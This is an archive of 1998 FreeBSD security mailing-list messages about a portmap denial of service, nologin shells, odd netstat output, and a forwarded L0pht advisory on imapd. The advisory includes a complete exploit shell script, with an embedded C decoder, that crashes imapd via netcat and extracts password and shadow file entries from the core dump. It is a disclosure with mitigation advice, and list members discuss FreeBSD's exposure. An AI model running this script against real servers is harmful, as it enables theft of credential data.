owner-freebsd-security@FreeBSD.ORG) Received: from priscilla.mu.org (paul@priscilla.mu.org [206.156.231.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA29475 for ; Mon, 25 May 1998 13:34:19 -0700 (PDT) (envelope-from paul@priscilla.mu.org) Received: (from paul@localhost) by priscilla.mu.org (8.8.8/8.8.8) id PAA20156; Mon, 25 May 1998 15:33:01 -0500 (CDT) (envelope-from paul) Message-ID: <19980525153301.A20100@mu.org> Date: Mon, 25 May 1998 15:33:01 -0500 From: Paul Saab To: Mike Smith Cc: freebsd-security@FreeBSD.ORG Subject: Re: possible problem with portmap References: <19980525123417.A19300@mu.org> <199805251910.MAA13972@antipodes.cdrom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.91.1i In-Reply-To: <199805251910.MAA13972@antipodes.cdrom.com>; from Mike Smith on Mon, May 25, 1998 at 12:10:21PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk OK.. I disabled sunrpc (port 111) at the router. Is the worst thing that could have happened to me be just a DoS of portmap-related stuff? Ie: he could not have gotten root? Thanks, Paul Mike Smith (mike@smith.net.au) wrote: > > Today I logged into our server and noticed someone sitting on port > > 111. Are there any known problems with portmap? > > Yes. > > > this is what I got from netstat.. > > tcp 0 0 tranq1.sunrpc dialup239-1-15.s.2988 ESTABLISHED > > tcp 0 0 tranq1.sunrpc dialup239-1-15.s.2987 ESTABLISHED > > Find out who the dialup user is; they're engaged in a portmap-related > DoS attack on you. > > There were changes committed a few days back to address this - it was > also discussed on BugTraq (with a not inconsiderable degree of hysteria > it seems). > > -- > \\ Sometimes you're ahead, \\ Mike Smith > \\ sometimes you're behind. \\ mike@smith.net.au > \\ The race is long, and in the \\ msmith@freebsd.org > \\ end it's only with yourself. \\ msmith@cdrom.com > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon May 25 13:36:29 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA00142 for freebsd-security-outgoing; Mon, 25 May 1998 13:36:29 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from www.communique.no (www.communique.no [193.212.204.33]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id NAA00125 for ; Mon, 25 May 1998 13:36:17 -0700 (PDT) (envelope-from are@communique.no) Received: (qmail 6364 invoked by uid 1001); 25 May 1998 20:41:54 -0000 Date: Mon, 25 May 1998 22:41:53 +0200 (CEST) From: Are Bryne X-Sender: are@rune.communique.no To: Philippe Regnauld cc: Mike Smith , freebsd-security@FreeBSD.ORG Subject: Re: SKey and locked account In-Reply-To: <19980525094211.24803@deepo.prosa.dk> Message-ID: Organization: Communique DA MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk On Mon, 25 May 1998, Philippe Regnauld wrote: > Mike Smith writes: > > > > > > Then perhaps the default /nonexistent 'shell' for various password file > > > entries should be changed also? > > > > It would probably make sense to have /sbin/nologin the default shell > > for those accounts, yes. Want to file a PR? > > Give me a day or so (if someone else doesn't do it), I'll > write up the PR (man page patch + PR for /nonexistent). I had already done so (sent the PR), and notified Mike Smith, but didn't think it worthy of the list... The man page patch would, I take it, be most welcome. Here is the response: Thank you very much for your problem report. It has the internal identification `conf/6739'. The individual assigned to look at your report is: freebsd-bugs. >Category: conf >Responsible: freebsd-bugs >Synopsis: Proposing a change to default '/nonexistent' passwd shell entry >Arrival-Date: Sun May 24 07:20:00 PDT 1998 Regards, Are To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon May 25 14:07:33 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA04477 for freebsd-security-outgoing; Mon, 25 May 1998 14:07:33 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from antipodes.cdrom.com (castles348.castles.com [208.214.167.48]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA04448 for ; Mon, 25 May 1998 14:07:11 -0700 (PDT) (envelope-from mike@antipodes.cdrom.com) Received: from antipodes.cdrom.com (localhost [127.0.0.1]) by antipodes.cdrom.com (8.8.8/8.8.5) with ESMTP id NAA14219; Mon, 25 May 1998 13:02:58 -0700 (PDT) Message-Id: <199805252002.NAA14219@antipodes.cdrom.com> X-Mailer: exmh version 2.0zeta 7/24/97 To: Paul Saab cc: Mike Smith , freebsd-security@FreeBSD.ORG Subject: Re: possible problem with portmap In-reply-to: Your message of "Mon, 25 May 1998 15:33:01 CDT." <19980525153301.A20100@mu.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 25 May 1998 13:02:58 -0700 From: Mike Smith Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > OK.. I disabled sunrpc (port 111) at the router. Is the worst > thing that could have happened to me be just a DoS of portmap-related > stuff? Ie: he could not have gotten root? That's correct (RPC DoS). -- \\ Sometimes you're ahead, \\ Mike Smith \\ sometimes you're behind. \\ mike@smith.net.au \\ The race is long, and in the \\ msmith@freebsd.org \\ end it's only with yourself. \\ msmith@cdrom.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Tue May 26 08:39:07 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA17435 for freebsd-security-outgoing; Tue, 26 May 1998 08:39:07 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from super-g.inch.com (super-g.com [207.240.140.161]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA17419 for ; Tue, 26 May 1998 08:38:45 -0700 (PDT) (envelope-from spork@super-g.com) Received: from localhost (localhost [127.0.0.1]) by super-g.inch.com (8.8.8/8.8.5) with SMTP id LAA14764; Tue, 26 May 1998 11:36:50 -0400 (EDT) Date: Tue, 26 May 1998 11:36:50 -0400 (EDT) From: spork X-Sender: spork@super-g.inch.com To: Mike Smith cc: Paul Saab , freebsd-security@FreeBSD.ORG Subject: Re: possible problem with portmap In-Reply-To: <199805252002.NAA14219@antipodes.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Did anyone quite understand the "nfs-shell" thread on bugtraq? It was discussed shortly after the portmap DoS thread. From what I could gather you could get an interactive shell via nfs?? Thanks, Charles Charles Sprickman spork@super-g.com ---- On Mon, 25 May 1998, Mike Smith wrote: > > OK.. I disabled sunrpc (port 111) at the router. Is the worst > > thing that could have happened to me be just a DoS of portmap-related > > stuff? Ie: he could not have gotten root? > > That's correct (RPC DoS). > > -- > \\ Sometimes you're ahead, \\ Mike Smith > \\ sometimes you're behind. \\ mike@smith.net.au > \\ The race is long, and in the \\ msmith@freebsd.org > \\ end it's only with yourself. \\ msmith@cdrom.com > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Tue May 26 09:16:09 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA25403 for freebsd-security-outgoing; Tue, 26 May 1998 09:16:09 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from firewall.ftf.dk (root@mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA25209 for ; Tue, 26 May 1998 09:15:44 -0700 (PDT) (envelope-from regnauld@deepo.prosa.dk) Received: from mail.prosa.dk ([192.168.100.2]) by firewall.ftf.dk (8.7.6/8.7.3) with ESMTP id UAA10261; Tue, 26 May 1998 20:16:43 +0200 Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.5/8.8.5/prosa-1.1) with ESMTP id SAA08097; Tue, 26 May 1998 18:15:13 +0200 (CEST) Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.7/8.8.5/prosa-1.1) id SAA11861; Tue, 26 May 1998 18:14:25 +0200 (CEST) Message-ID: <19980526181425.28553@deepo.prosa.dk> Date: Tue, 26 May 1998 18:14:25 +0200 From: Philippe Regnauld To: spork Cc: freebsd-security@FreeBSD.ORG Subject: Re: possible problem with portmap References: <199805252002.NAA14219@antipodes.cdrom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Mailer: Mutt 0.88e In-Reply-To: ; from spork on Tue, May 26, 1998 at 11:36:50AM -0400 X-Operating-System: FreeBSD 2.2.5-STABLE i386 Organization: PROSA Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk spork writes: > Did anyone quite understand the "nfs-shell" thread on bugtraq? It was > discussed shortly after the portmap DoS thread. From what I could gather > you could get an interactive shell via nfs?? Err, I think it was more like a command-shell to test/debug NFS-related things. -- -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]- «Pluto placed his bad dog at the entrance of Hades to keep the dead IN and the living OUT! The archetypical corporate firewall?» - S. Kelly Bootle To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Tue May 26 10:51:15 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA14513 for freebsd-security-outgoing; Tue, 26 May 1998 10:51:15 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from tiger.acsu.k12.vt.us (tiger.acsu.k12.vt.us [170.222.18.30]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA14198 for ; Tue, 26 May 1998 10:50:03 -0700 (PDT) (envelope-from jflemer@tiger.acsu.k12.vt.us) Received: (from jflemer@localhost) by tiger.acsu.k12.vt.us (8.8.7/8.8.7) id NAA06996; Tue, 26 May 1998 13:49:59 -0400 (EDT) Date: Tue, 26 May 1998 13:49:59 -0400 (EDT) From: James Flemer Message-Id: <199805261749.NAA06996@tiger.acsu.k12.vt.us> To: freebsd-security@FreeBSD.ORG Subject: imapd_4.1b.txt X-URL: http://rootshell.com/archive-ld8dkslxlxja/199710/imapd_4.1b.txt Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk L0pht Security Advisory Advisory released Oct 8 1997 Application: imapd (imap-4.1BETA from the IMAP 4.1 toolkit from University of Washington) Severity: any user with an account can remotely grab the shadowed password file. Author: mudge@l0pht.com http://www.l0pht.com/advisories.html Scenario: It is possible to crash the imapd server in several possible places. Due to the lack of handling for the SIGABRT signal and the nature of the IMAP protocol in storing folders locally on the server; a core dump is produced in the users current directory. This core dump contains the password and shadow password files from the system. Example: ./imap_core.sh usage: imap_core.sh target username password ./imap_core.sh target jdoe letmein imap_core.sh - this is a quick proof of concept tool that causes some imapd implementations to dump core. Unfortunately the core file contains the password and shadow password file in it! .mudge [mudge@l0pht.com] [Starting] Built base64 decoder... Running imap attack... Forced server to dump core. Reconnecting to grab file and clean up! Stripping trailing c/r from RFC822 base64 encapsulated core file Removing imap crap from beginning and end of core.24487 Converting base64 image to binary core file... core.24487: ELF 32-bit MSB core file SPARC Version 1, from 'imapd' Successfully grabbed some form of password file for target.com results located in ./etc_passwd.target.com Successfully grabbed some form of shadow file for target.com results located in ./etc_shadow.target.foo.bar [note: some manual cleanup of ./etc_shadow.target.com is probably required] [Finished] Description: In several situations it is possible to make the imapd server call the function fatal() which is as follows in osdep/unix/ftl_unix.c: /* Report a fatal error * Accepts: string to output */ void fatal (char *string) { mm_fatal (string); /* pass up the string */ syslog (LOG_ALERT,"IMAP toolkit crash: %.100s",string); abort (); /* die horribly */ } If SIGABRT is caught and the signal handler does not return, things would be okay, life would go on, and Frank Zappa's death would be a big sick joke. However, SIGABRT is not caught or ignored. Since part of the beauty of the IMAP protocol is that you can maintain your mailboxes on the server, your directory must be writable by at least yourself. What happens when SIGABRT is not caught, not ignored, and the current direcorty is writable? core dump. Here are just a few of the areas where fatal() is called. c-client/mail.c: if (stream->lock) fatal ("Lock when already locked"); c-client/mail.c: if (!stream->lock) fatal ("Unlock when not locked"); imapd/imapd.c: if (quell_events) fatal ("Impossible EXPUNGE event"); osdep/unix/fs_unix.c: if (!block) fatal ("Out of free storage"); osdep/unix/fs_unix.c: fatal ("Can't resize free storage"); osdep/unix/env_unix.c: if (myUserName) fatal ("env_init called twice!"); osdep/unix/dummy.c: fatal ("Impossible dummy_copy"); Solution: There are several places where imapd can be forced to abort(3C). There are also several ways to prevent each area. As opposed to forcing our preferred way of fixing the code and thus precluding potentially more ellegant patches we choose to suggest a blanket solution. This should allow the author of the application to fix these problems as he sees fit while alerting everyone (good and bad) of the problem and a stop-gap fix in the mean time. This said, we recommend that core dumps not be permitted from any application running out of inetd. If you need to test these things do so in a controlled environment. No production machine should be allowed to crap all over the place. "But wait!", You say, "what if we think the application is robust and then realize there is a problem later on. We need that core file". Face it, there are very few people out there that know what to do with core files other than rm(1) them. However, if this is the case then you sved yourself some heartache. Now that you know the application is not ready for prime time you can pull it back into a controlled environment and attempt to make it dump core again. For Solaris you can set the core dump size via the bourne shell's built-in ulimit command. /etc/init.d/inetsvc should contain the line ulimit -c 0 directly above the line starting off inetd. ---excerpt snip--- ulimit -c 0 /usr/sbin/inetd -s --- excerpt snip--- Don't forget to kill inetd and re-run the inetsvc script. Other OS's should check if their bourne shell has a built in ulimit and if not, follow whatever methods are used on their particular system to prevent core dumps or limit their size to 0. You can use the following script to test if you are vulnerable or to check that your fix worked. [note: you will need netcat for the script, netcat available from http://www.avian.org and other fine fast food establishments ] Exploit code: ------cut here------ #!/bin/sh # mudge@l0pht.com # # A quick little tool that shows the dangers of priveledged programs dumping # core. # # Shout outs to a bunch of people - in particular Nettwerk. # Hey Nettwerk where'd ya go? # Programs NC=/usr/local/bin/nc CAT=/bin/cat RM=/bin/rm GREP=/bin/grep TAIL=/bin/tail HEAD=/bin/head MV=/bin/mv TR=/bin/tr STRINGS=/bin/strings FILE=/bin/file CC=/usr/local/bin/gcc # temporary command and storage files CMDS1=nc_commands1 CMDS2=nc_commands2 DECODE64_SRC=b64.c TMPNAM=vunlklyname TMPFILE=tmp.$$ # compiled BASE64 decoding program DECODE64=./b64 # core file - sometimes base64 sometimes actuall dump file CORE=core.$$ if [ $# != 3 ] ; then echo "usage: `basename $0` target username password" exit fi echo echo "[L0pht Heavy Industries - l0pht.com]" echo "`basename $0` - " echo " this is a quick proof of concept tool that causes some imapd" echo " implementations to dump core. Unfortunately the core file " echo " contains the password and shadow password file in it!" echo " .mudge [mudge@l0pht.com]" echo # command line supplied variables TARGET=$1 USER=$2 PASS=$3 # resultant password and shadow files PASSWD=./etc_passwd_$TARGET SHADOW=./etc_shadow_$TARGET # the following logs in in plaintext as opposed through X AUTHENTICATE - # you have been forwarned... # login with $user $pass # create a folder that probably isn't there # select the folder # copy the file to another name # the above will cause IMAP4rev1 to crash via calling dummy_copy # note: there are many other ways to get this thing to crash. cat > $CMDS1 << FOEFOE 1 LOGIN $USER $PASS 2 CREATE $TMPNAM 3 SELECT $TMPNAM 4 COPY $TMPNAM $TMPNAM.$$ FOEFOE # login with $user $pass (again in plaintext...) # select the core file # retrieve the core file base64 encoded as per RFC822 # delete the core file # delete the temporary file we created # bye bye cat > $CMDS2 << FOEFOE 1 LOGIN $USER $PASS 2 SELECT core 3 UID FETCH 1 (UID RFC822.SIZE RFC822) 4 DELETE core 5 DELETE $TMPNAM 4 LOGOUT FOEFOE # The following quick little program to decode base64 was yanked in # big chunks from Dave Winer's code sitting on # http://www.scripting.com/midas/base64/source.html # hey, credit where it's due - Dave saved me some time here. # modest changes by: mudge@l0pht.com cat > $DECODE64_SRC << FOEFOE #include #define TRUE 1 #define FALSE 0 void decodefile(FILE *, FILE *); int main(int argc, char *argv[]){ FILE *fin, *fout; if (argc > 3){ printf("Usage: %s \n", argv[0]); exit(1); } switch(argc){ case 3: fin = fopen(argv[1], "r"); fout = fopen(argv[2], "w"); if (!fin || !fout) { perror("fopen"); exit(1); } break; case 2: fin = fopen(argv[1], "r"); fout = stdout; if (!fin) { perror("fopen"); exit(1); } break; case 1: fin = stdin; fout = stdout; break; } decodefile(fin, fout); close(fin); close(fout); exit(0); } void decodefile(FILE *fin, FILE *fout) { short charctr; int breakout; unsigned char ch; unsigned char inbuf[3], outbuf[4]; short bufctr = 0, ignore, eot = 0; while ((ch = fgetc(fin))) { if (feof(fin)){ close(fin); break; } ignore = FALSE; if ((ch >= 'A') && (ch <= 'Z')) ch = ch - 'A'; else if ((ch >= 'a') && (ch <= 'z')) ch = ch - 'a' + 26; else if ((ch >= '0') && (ch <= '9')) ch = ch - '0' + 52; else if (ch == '+') ch = 62; else if (ch == '=') eot = TRUE; else if (ch == '/') ch = 63; else ignore = TRUE; if (!ignore) { charctr = 3; breakout = FALSE; if (eot) { if (bufctr == 0) break; if ((bufctr == 1) || (bufctr == 2)) charctr = 1; else charctr = 2; bufctr = 3; breakout = TRUE; } inbuf[bufctr++] = ch; if (bufctr == 4) { bufctr = 0; outbuf[0] = (inbuf[0] << 2) | ((inbuf[1] & 0x30) >> 4); outbuf[1] = ((inbuf[1] & 0x0F) << 4) | ((inbuf[2] & 0x3C) >> 2); outbuf[2] = ((inbuf[2] & 0x03) << 6) | (inbuf[3] & 0x3F); fprintf(fout, "%c%c%c", outbuf[0], outbuf[1], outbuf[2]); } if (breakout) break; } } } FOEFOE $CC -o $DECODE64 $DECODE64_SRC if [ ! -x $DECODE64 ] ; then echo "failed to compile base 64 decoding utility" echo "stop" $RM -f $DECODE64_SRC $DECODE64 exit fi echo "[Starting]" echo "Built base64 decoder..." echo echo "Running imap attack..." $CAT $CMDS1 | $NC -w 10 $TARGET 143 > $TMPFILE grep -i "server crashing" $TMPFILE > /dev/null if [ $? -eq 0 ] ; then echo echo "Forced server to dump core. Reconnecting to grab file and clean up!" $CAT $CMDS2 | $NC -w 10 $TARGET 143 > $CORE $RM -f $CMDS1 $CMDS2 $TMPFILE echo "Stripping trailing c/r from RFC822 base64 encapsulated core file" # interesting... I must've missed the section of rfc 1521 that stated # they'd make this DOS'ish $TR -d '\015' < $CORE > $CORE.2 # strip off ^M's from file $MV -f $CORE.2 $CORE else echo "Failed to crash server... cleaning up" $RM -f $CMDS1 $CMDS2 $TMPFILE $DECODE64 $DECODE64_SRC exit fi echo "Removing imap crap from beginning and end of $CORE" VAR=`grep -n "^$" $CORE | awk -F: '{print $1}'` VAR=`expr $VAR + 1` $TAIL +$VAR $CORE > $TMPFILE VAR=`grep -n "=" $TMPFILE | awk -F: '{print $1}'` $HEAD -$VAR $TMPFILE > $CORE $RM $TMPFILE echo echo "Converting base64 image to binary core file..." $DECODE64 $CORE $TMPFILE $MV $TMPFILE $CORE $FILE $CORE $STRINGS - $CORE | $GREP ':x:' > $PASSWD $STRINGS -n 13 - $CORE | $GREP ':' | $GREP -v ' ' | $GREP -v ':x:' > $SHADOW if [ -s $PASSWD ] ; then echo echo "Successfully grabbed some form of password file for $TARGET" echo " results located in $PASSWD" else echo "failed to create $PASSWD" $RM -f $PASSWD fi if [ -s $SHADOW ] ; then echo "Successfully grabbed some form of shadow file for $TARGET" echo " results located in $SHADOW" echo " [note: some manual cleanup of $SHADOW is probably required]" echo else echo "failed to create $SHADOW" echo $RM -f $SHADOW fi $RM -f $DECODE64 $DECODE64_SRC $MV -f $CORE core_${TARGET} echo "[Finished]" ------cut here------ mudge@l0pht.com --------------- For more L0pht (that's L - zero - P - H - T) advisories check out: http://www.l0pht.com/advisories.html --------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Tue May 26 15:41:43 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA09407 for freebsd-security-outgoing; Tue, 26 May 1998 15:41:43 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from access.sanet.ge (access.sanet.ge [208.239.39.51]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA09278 for ; Tue, 26 May 1998 15:40:54 -0700 (PDT) (envelope-from kai@sanet.ge) Received: from localhost (kai@localhost) by access.sanet.ge (8.8.8/8.8.7) with SMTP id CAA21594 for ; Wed, 27 May 1998 02:39:13 +0500 (GET) (envelope-from kai@sanet.ge) X-Authentication-Warning: access.sanet.ge: kai owned process doing -bs Date: Wed, 27 May 1998 02:39:13 +0500 (GET) From: Alexander Kandelaki To: freebsd-security@FreeBSD.ORG Subject: strange from Netstat :( Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Hi 1 Today i run command netstat on my system (FreeBSD-2.2.6) and get strange results, please explain me what does it means , is it was atack ? May be netstat problem ? With best regards Alexander << tcp 0 0 access.pop3 internews-custom.1991 TIME_WAIT tcp 0 0 access.pop3 internews-custom.1990 TIME_WAIT tcp 0 0 access.pop3 internews-custom.1988 TIME_WAIT tcp 0 0 access.4987 mx1.boston.juno..smtp ESTABLISHED tcp 0 0 access.smtp f52.hotmail.com.1213 TIME_WAIT tcp 0 0 access.4983 206.26.43.3.smtp SYN_SENT tcp 0 -266200144 access.4982 144.49.1.241.25 CLOSED tcp 12 -266140352 access.4943 16.245.255.240.25 CLOSED tcp 66 -266192048 access.4866 144.247.255.240.25 CLOSED tcp 1 -265850836 catk.biosci.uga..64240 144.5.252.240.37039 CLOSED* tcp 180236 -265923220 88.2.0.0.* 144.127.255.240.6 CLOSED* tcp 297 -265765036 access.4991 144.218.252.240.25 CLOSED tcp 1 -266198016 access.4935 16.221.4.241.25 CLOSED* tcp 425998 -266192680 access.4863 16.216.0.241.25 CLOSED* tcp 88 -266201816 access.4877 144.159.252.240.25 CLOSED* tcp 481 -266190776 access.4756 16.212.0.241.25 CLOSED* tcp 244 -266083900 12.11.0.0.* mcs241.sqo.dec.c.12 CLOSED* tcp 146 -266188256 access.4656 144.68.252.240.25 CLOSED tcp 197 -266142256 0.3.5.241.64752 144.50.11.241.39129 CLOSED* tcp 488 -266141808 128.193.252.240.241 16.120.255.240.4348 -26594166 tcp 3 -266189776 0.252.11.241.3569 16.150.231.240.37042 CLOSED* tcp 488 -266141808 128.193.252.240.241 16.120.255.240.4348 -26594166 tcp 3 -266189776 0.252.11.241.3569 16.150.231.240.37042 CLOSED* tcp 3 -266199064 128.155.252.240.3569 16.247.11.241.6382 -26577270 tcp 0 -265755520 0.247.11.241.3057 16.215.251.240.36961 -26607170 tcp 33 -265704768 128.135.251.240.64752 16.142.253.240.39108 -26600766 tcp 70 -265920776 0.51.1.241.3057 16.3.5.241.38962 CLOSED* tcp 241 -266197776 access.pop3 144.210.1.241.1988 -26570618 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Tue May 26 17:08:02 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA25850 for freebsd-security-outgoing; Tue, 26 May 1998 17:08:02 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from implode.root.com (implode.root.com [198.145.90.17]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA25585 for ; Tue, 26 May 1998 17:07:13 -0700 (PDT) (envelope-from root@implode.root.com) Received: from implode.root.com (localhost [127.0.0.1]) by implode.root.com (8.8.5/8.8.5) with ESMTP id RAA03312; Tue, 26 May 1998 17:07:19 -0700 (PDT) Message-Id: <199805270007.RAA03312@implode.root.com> To: James Flemer cc: freebsd-security@FreeBSD.ORG Subject: Re: imapd_4.1b.txt In-reply-to: Your message of "Tue, 26 May 1998 13:49:59 EDT." <199805261749.NAA06996@tiger.acsu.k12.vt.us> From: David Greenman Reply-To: dg@root.com Date: Tue, 26 May 1998 17:07:19 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > It is possible to crash the imapd server in several possible places. > Due to the lack of handling for the SIGABRT signal and the nature > of the IMAP protocol in storing folders locally on the server; a core dump > is produced in the users current directory. This core dump contains the > password and shadow password files from the system. In the case of FreeBSD, it could contain the no-password passwd file, but in order for the encrypted passwords to be in memory, the process would have to be setuid root, and if that is the case, the system won't generate a core file. -DG David Greenman Co-founder/Principal Architect, The FreeBSD Project To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Tue May 26 18:53:43 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA12504 for freebsd-security-outgoing; Tue, 26 May 1998 18:53:43 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dingo.cdrom.com (dingo.cdrom.com [204.216.28.145]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA12467 for ; Tue, 26 May 1998 18:53:21 -0700 (PDT) (envelope-from mike@dingo.cdrom.com) Received: from dingo.cdrom.com (localhost [127.0.0.1]) by dingo.cdrom.com (8.8.8/8.8.5) with ESMTP id RAA02472; Tue, 26 May 1998 17:47:22 -0700 (PDT) Message-Id: <199805270047.RAA02472@dingo.cdrom.com> X-Mailer: exmh version 2.0zeta 7/24/97 To: dg@root.com cc: James Flemer , freebsd-security@FreeBSD.ORG Subject: Re: imapd_4.1b.txt In-reply-to: Your message of "Tue, 26 May 1998 17:07:19 PDT." <199805270007.RAA03312@implode.root.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 26 May 1998 17:47:22 -0700 From: Mike Smith Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > > It is possible to crash the imapd server in several possible places. > > Due to the lack of handling for the SIGABRT signal and the nature > > of the IMAP protocol in storing folders locally on the server; a core dump > > is produced in the users current directory. This core dump contains the > > password and shadow password files from the system. > > In the case of FreeBSD, it could contain the no-password passwd file, but > in order for the encrypted passwords to be in memory, the process would have > to be setuid root, and if that is the case, the system won't generate a core > file. Does imapd not run as root from /etc/inetd.conf? The binary is not setuid in the package tarball... -- \\ Sometimes you're ahead, \\ Mike Smith \\ sometimes you're behind. \\ mike@smith.net.au \\ The race is long, and in the \\ msmith@freebsd.org \\ end it's only with yourself. \\ msmith@cdrom.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Tue May 26 19:30:34 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA20451 for freebsd-security-outgoing; Tue, 26 May 1998 19:30:34 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from implode.root.com (implode.root.com [198.145.90.17]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA20417 for ; Tue, 26 May 1998 19:30:20 -0700 (PDT) (envelope-from root@implode.root.com) Received: from implode.root.com (localhost [127.0.0.1]) by implode.root.com (8.8.5/8.8.5) with ESMTP id TAA04252; Tue, 26 May 1998 19:30:08 -0700 (PDT) Message-Id: <199805270230.TAA04252@implode.root.com> To: Mike Smith cc: James Flemer , freebsd-security@FreeBSD.ORG Subject: Re: imapd_4.1b.txt In-reply-to: Your message of "Tue, 26 May 1998 17:47:22 PDT." <199805270047.RAA02472@dingo.cdrom.com> From: David Greenman Reply-To: dg@root.com Date: Tue, 26 May 1998 19:30:08 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk >> > It is possible to crash the imapd server in several possible places. >> > Due to the lack of handling for the SIGABRT signal and the nature >> > of the IMAP protocol in storing folders locally on the server; a core dump >> > is produced in the users current directory. This core dump contains the >> > password and shadow password files from the system. >> >> In the case of FreeBSD, it could contain the no-password passwd file, but >> in order for the encrypted passwords to be in memory, the process would have >> to be setuid root, and if that is the case, the system won't generate a core >> file. > >Does imapd not run as root from /etc/inetd.conf? The binary is not >setuid in the package tarball... If it is run as root, then the core file will be owned by root with no permissions for group or other, so you'd have to be root to read it. -DG David Greenman Co-founder/Principal Architect, The FreeBSD Project To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Tue May 26 19:43:07 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA22348 for freebsd-security-outgoing; Tue, 26 May 1998 19:43:07 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dingo.cdrom.com (dingo.cdrom.com [204.216.28.145]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA22320 for ; Tue, 26 May 1998 19:42:55 -0700 (PDT) (envelope-from mike@dingo.cdrom.com) Received: from dingo.cdrom.com (localhost [127.0.0.1]) by dingo.cdrom.com (8.8.8/8.8.5) with ESMTP id SAA02758; Tue, 26 May 1998 18:36:45 -0700 (PDT) Message-Id: <199805270136.SAA02758@dingo.cdrom.com> X-Mailer: exmh version 2.0zeta 7/24/97 To: dg@root.com cc: Mike Smith , James Flemer , freebsd-security@FreeBSD.ORG Subject: Re: imapd_4.1b.txt In-reply-to: Your message of "Tue, 26 May 1998 19:30:08 PDT." <199805270230.TAA04252@implode.root.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 26 May 1998 18:36:45 -0700 From: Mike Smith Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > >Does imapd not run as root from /etc/inetd.conf? The binary is not > >setuid in the package tarball... > > If it is run as root, then the core file will be owned by root with no > permissions for group or other, so you'd have to be root to read it. ... and if it changes UID to manipulate your mail folders, it will no longer drop a core. Ok, it sounds like the door is closed on that one. 